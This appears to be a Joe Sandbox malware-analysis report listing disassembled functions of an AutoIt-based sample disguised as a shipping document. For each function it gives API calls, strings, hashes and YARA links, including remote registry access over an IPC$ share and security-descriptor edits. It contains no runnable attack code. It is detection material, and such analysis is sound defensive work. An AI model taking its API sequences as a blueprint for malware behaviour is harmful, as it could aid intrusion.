Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 958dc802ef35642067560e4904432c04844707ffec1684e9a5db716ac0301cbc
Instruction ID: 06ba80ae3fa6df09c636353e655b6b40f292efdd6fab4338a9ae358871689c97
Opcode Fuzzy Hash: 958dc802ef35642067560e4904432c04844707ffec1684e9a5db716ac0301cbc
Instruction Fuzzy Hash: 4D416C72800209AACB54FBE0CD96EEEB77AEF19344F10016DB50276092EA346F19CB75

Function 006CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006CD0D8
__swprintf.LIBCMT ref: 006CD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 006CD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006CD15C
_memset.LIBCMT ref: 006CD17B
_wcsncpy.LIBCMT ref: 006CD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006CD1EC
CloseHandle.KERNEL32(00000000), ref: 006CD1F7
RemoveDirectoryW.KERNEL32(?), ref: 006CD200
CloseHandle.KERNEL32(00000000), ref: 006CD20A

Strings

:, xrefs: 006CD11B
\??\%s, xrefs: 006CD0F4
\, xrefs: 006CD110

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: d6d5de16fd31090d87fe8308332938574edfe6e919d9130614d57d83f934c06c
Instruction ID: b790752fece84e6c72c0381072d0a3e8bf159860b04234335be7f8fdc0974f8d
Opcode Fuzzy Hash: d6d5de16fd31090d87fe8308332938574edfe6e919d9130614d57d83f934c06c
Instruction Fuzzy Hash: A2319376500209ABDB21DFA0CC49FEB77BDEF89740F1041B9F509D2161EB749B458B28

Function 006EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006EBEF4,?,?), ref: 006EE754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE776
CloseHandle.KERNEL32(00000000,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE783
GlobalLock.KERNEL32(00000000), ref: 006EE78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE79B
GlobalUnlock.KERNEL32(00000000), ref: 006EE7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006EBEF4,?,?,00000000,?), ref: 006EE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0070D9BC,?), ref: 006EE7D5
GlobalFree.KERNEL32(00000000), ref: 006EE7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 006EE809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 006EE834
DeleteObject.GDI32(00000000), ref: 006EE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006EE872

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1f7240d2dc77cc807aec0cdbf3aaf1c5381b3278e5841fcb939002c4b1f1eeab
Instruction ID: 9a2df00bb06260c8a6704c7f0925406e3e909601307b800a6abe7c596d4b38af
Opcode Fuzzy Hash: 1f7240d2dc77cc807aec0cdbf3aaf1c5381b3278e5841fcb939002c4b1f1eeab
Instruction Fuzzy Hash: 46414975601305EFDB219FA5CC48EAB7BB9FB89711F108158F90AD7260DB359D41CB20

Function 006D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 006D076F
_wcscat.LIBCMT ref: 006D0787
_wcscat.LIBCMT ref: 006D0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006D07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 006D07C2
GetFileAttributesW.KERNEL32(?), ref: 006D07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 006D07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 006D0806

Strings

*.*, xrefs: 006D0845

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 80d5e017b24b9566d0607b97ac54b1e0e872f083a653568d76488e39f8f1ad02
Instruction ID: a37744e415d67bd4b6236365f887aa8f4d366ef8ab271b4dfe5b255a9cae1d71
Opcode Fuzzy Hash: 80d5e017b24b9566d0607b97ac54b1e0e872f083a653568d76488e39f8f1ad02
Instruction Fuzzy Hash: 89819F719043419FEB64EF64C845AAEB7EABBC9304F14882FF885C7351EA34DD458B92

Function 006EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006EEF3B
GetFocus.USER32 ref: 006EEF4B
GetDlgCtrlID.USER32(00000000), ref: 006EEF56
_memset.LIBCMT ref: 006EF081
GetMenuItemInfoW.USER32 ref: 006EF0AC
GetMenuItemCount.USER32(00000000), ref: 006EF0CC
GetMenuItemID.USER32(?,00000000), ref: 006EF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 006EF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 006EF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006EF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006EF1C8

Strings

0, xrefs: 006EF079

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8dc6b34e20a2107197bba0ebb3beac22fbefe1912bba769899c826fa00e01e04
Instruction ID: 399b9213b58f2ed3b9c7eec4514bd98f258ccd07735b2d8dc7796a0d380c7486
Opcode Fuzzy Hash: 8dc6b34e20a2107197bba0ebb3beac22fbefe1912bba769899c826fa00e01e04
Instruction Fuzzy Hash: F981A07120A345EFD720DF16C884AABBBEAFB88314F10456EF99897291DB31DC05CB56

Function 006BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006BABD7
Part of subcall function 006BABBB: GetLastError.KERNEL32(?,006BA69F,?,?,?), ref: 006BABE1
Part of subcall function 006BABBB: GetProcessHeap.KERNEL32(00000008,?,?,006BA69F,?,?,?), ref: 006BABF0
Part of subcall function 006BABBB: HeapAlloc.KERNEL32(00000000,?,006BA69F,?,?,?), ref: 006BABF7
Part of subcall function 006BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006BAC0E

Part of subcall function 006BAC56: GetProcessHeap.KERNEL32(00000008,006BA6B5,00000000,00000000,?,006BA6B5,?), ref: 006BAC62
Part of subcall function 006BAC56: HeapAlloc.KERNEL32(00000000,?,006BA6B5,?), ref: 006BAC69
Part of subcall function 006BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006BA6B5,?), ref: 006BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006BA8CB
_memset.LIBCMT ref: 006BA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006BA8FF
GetLengthSid.ADVAPI32(?), ref: 006BA910
GetAce.ADVAPI32(?,00000000,?), ref: 006BA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006BA969
GetLengthSid.ADVAPI32(?), ref: 006BA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006BA995
HeapAlloc.KERNEL32(00000000), ref: 006BA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006BA9BD
CopySid.ADVAPI32(00000000), ref: 006BA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006BA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006BAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006BAA2F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 0bbc6cb0c3c7e7e6324e368d993f5a3012a0881a16b4d56bb71446a1fe5e9b05
Instruction ID: c93df0307bfb14e72bd586f9982650c5cfb27316cec4c7d0d3812cca2939dd5a
Opcode Fuzzy Hash: 0bbc6cb0c3c7e7e6324e368d993f5a3012a0881a16b4d56bb71446a1fe5e9b05
Instruction Fuzzy Hash: BC512AB1900209EFDF24DFD4DD85AEEBBBAFF04300F048219E955A6290DB359E45CB65

Function 006CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 006CCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 006CCCC5
__swprintf.LIBCMT ref: 006CCD1E
__swprintf.LIBCMT ref: 006CCD37
_wprintf.LIBCMT ref: 006CCDED
_wprintf.LIBCMT ref: 006CCE0B

Strings

Line %d (File "%s"):, xrefs: 006CCD18, 006CCD31
"%s" (%d) : ==> %s:, xrefs: 006CCE06
^ ERROR, xrefs: 006CCD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 006CCDE8
Error: , xrefs: 006CCDB5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 1440bec25b862a247a7ea7e4c307510dc4ed67e66173023f376ba1ee7089133b
Instruction ID: e6a5f7de03f123a1643e5a58f81922c08cd120992872f6be7af8ad74fd449e24
Opcode Fuzzy Hash: 1440bec25b862a247a7ea7e4c307510dc4ed67e66173023f376ba1ee7089133b
Instruction Fuzzy Hash: C251BE71800109AACB14FBE0CD46EEEB77AEF09314F10426AF406721A2EB346F59DF65

Function 006CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 006CCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006CCAB0
__swprintf.LIBCMT ref: 006CCB09
__swprintf.LIBCMT ref: 006CCB22
_wprintf.LIBCMT ref: 006CCBCD
_wprintf.LIBCMT ref: 006CCBEB

Strings

Line %d (File "%s"):, xrefs: 006CCB03, 006CCB1C
"%s" (%d) : ==> %s:, xrefs: 006CCBE6
^ ERROR , xrefs: 006CCB64
"%s" (%d) : ==> %s:%s%s, xrefs: 006CCBC8
Error: , xrefs: 006CCB95

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: d6f2ef67aa8addaa7b265e370d477dd0d0fc5bc2c517b5223c12c8e0ab862bae
Instruction ID: 978977952b559e5bb83b0c4b00e1d56800892c7587dfe40ba72be1c8309e382e
Opcode Fuzzy Hash: d6f2ef67aa8addaa7b265e370d477dd0d0fc5bc2c517b5223c12c8e0ab862bae
Instruction Fuzzy Hash: DD51BF71800209AACB25FBE0CD46EEEB77AEF05314F10416AF509720A2EB346F59DF65

Function 006E3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,006E2BB5,?,?), ref: 006E3C1D

Strings

HKCC, xrefs: 006E3CD1
HKU, xrefs: 006E3D15
HKCU, xrefs: 006E3CF3
$Es, xrefs: 006E3C36
HKLM, xrefs: 006E3C81
HKCR, xrefs: 006E3CAB
HKEY_LOCAL_MACHINE, xrefs: 006E3C6C
HKEY_CURRENT_CONFIG, xrefs: 006E3CC0
HKEY_USERS, xrefs: 006E3D04
HKEY_CLASSES_ROOT, xrefs: 006E3C96
HKEY_CURRENT_USER, xrefs: 006E3CE2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharUpper
String ID: $Es$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-2773362503
Opcode ID: 57fea1d313c22d4c70d257f59d10b8d45e46ace843b7b7985d498fa336403571
Instruction ID: 7ae4b7a8e67afe28778f332fe191090b86fb88f611dfd98d639808eca3c95eca
Opcode Fuzzy Hash: 57fea1d313c22d4c70d257f59d10b8d45e46ace843b7b7985d498fa336403571
Instruction Fuzzy Hash: B8413A3011139A9BDF04EF11DC45AEA3366BF22340F105868ECA55B792EB75EE1B8B54

Function 006C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 006C5664
GetMenuItemCount.USER32(00741708), ref: 006C56ED
DeleteMenu.USER32(00741708,00000005,00000000,000000F5,?,?), ref: 006C577D
DeleteMenu.USER32(00741708,00000004,00000000), ref: 006C5785
DeleteMenu.USER32(00741708,00000006,00000000), ref: 006C578D
DeleteMenu.USER32(00741708,00000003,00000000), ref: 006C5795
GetMenuItemCount.USER32(00741708), ref: 006C579D
SetMenuItemInfoW.USER32(00741708,00000004,00000000,00000030), ref: 006C57D3
GetCursorPos.USER32(?), ref: 006C57DD
SetForegroundWindow.USER32(00000000), ref: 006C57E6
TrackPopupMenuEx.USER32(00741708,00000000,?,00000000,00000000,00000000), ref: 006C57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006C5805

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 7ea9968ff6c96540f00a02cda00fb2cf6926cae93365976d0c6a455e006547d3
Instruction ID: b05a5067d081cb3c2ad9ac37e318c3ed9b0799965452b3b7f0161e9680593adf
Opcode Fuzzy Hash: 7ea9968ff6c96540f00a02cda00fb2cf6926cae93365976d0c6a455e006547d3
Instruction Fuzzy Hash: DC71E470640615BEEB209B55CC49FFABF66FF00368F24420DF5166A2E1CB716C90DBA4

Function 006BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006BA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006BA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006BA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006BA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006BA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006BA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006BA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006BA2AB

Strings

SOFTWARE\Classes\, xrefs: 006BA17D
\CLSID, xrefs: 006BA193
\IPC$, xrefs: 006BA1F3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: f2ceaf4eadcdd534453fa54b713c7f89ba17f410165ddf20e03bbc123e919851
Instruction ID: 08b7b552cf205c3880af290d0fc4b0d975ea56056c1e5b58d75da6355c20ea90
Opcode Fuzzy Hash: f2ceaf4eadcdd534453fa54b713c7f89ba17f410165ddf20e03bbc123e919851
Instruction Fuzzy Hash: 0041E876C10229ABDB21EBE4DC85DEDB7B9BF04310F044229F905A3261EB749E45CB65

Function 006C67E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006C67FD
__swprintf.LIBCMT ref: 006C680A

Part of subcall function 006A172B: __woutput_l.LIBCMT ref: 006A1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 006C6834
LoadResource.KERNEL32(?,00000000), ref: 006C6840
LockResource.KERNEL32(00000000), ref: 006C684D
FindResourceW.KERNEL32(?,?,00000003), ref: 006C686D
LoadResource.KERNEL32(?,00000000), ref: 006C687F
SizeofResource.KERNEL32(?,00000000), ref: 006C688E
LockResource.KERNEL32(?), ref: 006C689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006C68F9

Strings

5s, xrefs: 006C67F6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5s
API String ID: 1433390588-2399958700
Opcode ID: 5af8ea640579fd5c16174ca1d6be7bdc961560b435e82cc39230e21986d5a89c
Instruction ID: 5e78a4fa73e9adfa9f1bd243cbbad79d6137ec9a1cbd673863f73b815831f791
Opcode Fuzzy Hash: 5af8ea640579fd5c16174ca1d6be7bdc961560b435e82cc39230e21986d5a89c
Instruction Fuzzy Hash: 2C31807590121AEBDB11AFA0DD49EBA7BA9FF09340F008529F902D2250E738DD51DBB8

Function 006C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006F36F4,00000010,?,Bad directive syntax error,0071DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006C25D6
LoadStringW.USER32(00000000,?,006F36F4,00000010), ref: 006C25DD
_wprintf.LIBCMT ref: 006C2610
__swprintf.LIBCMT ref: 006C2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006C26A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 006C260B
Line %d (File "%s"):, xrefs: 006C2647
Line %d:, xrefs: 006C262C
., xrefs: 006C2687
Error: , xrefs: 006C266F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: be16f5c20a65ed094891d2c77357f617ec65fd848fa086c00d8921cacf0801c7
Instruction ID: cc0b8354012e682cd3684fdb2e57bdcf44f9868e4bbd3b0923ee09c26c1ad495
Opcode Fuzzy Hash: be16f5c20a65ed094891d2c77357f617ec65fd848fa086c00d8921cacf0801c7
Instruction Fuzzy Hash: 99217E7184021AAFDF21BF90CC0AEEE7B7AFF19304F004559F505660A3DA75AA14DF65

Function 006C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006C7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006C7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006C7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006C7B7B
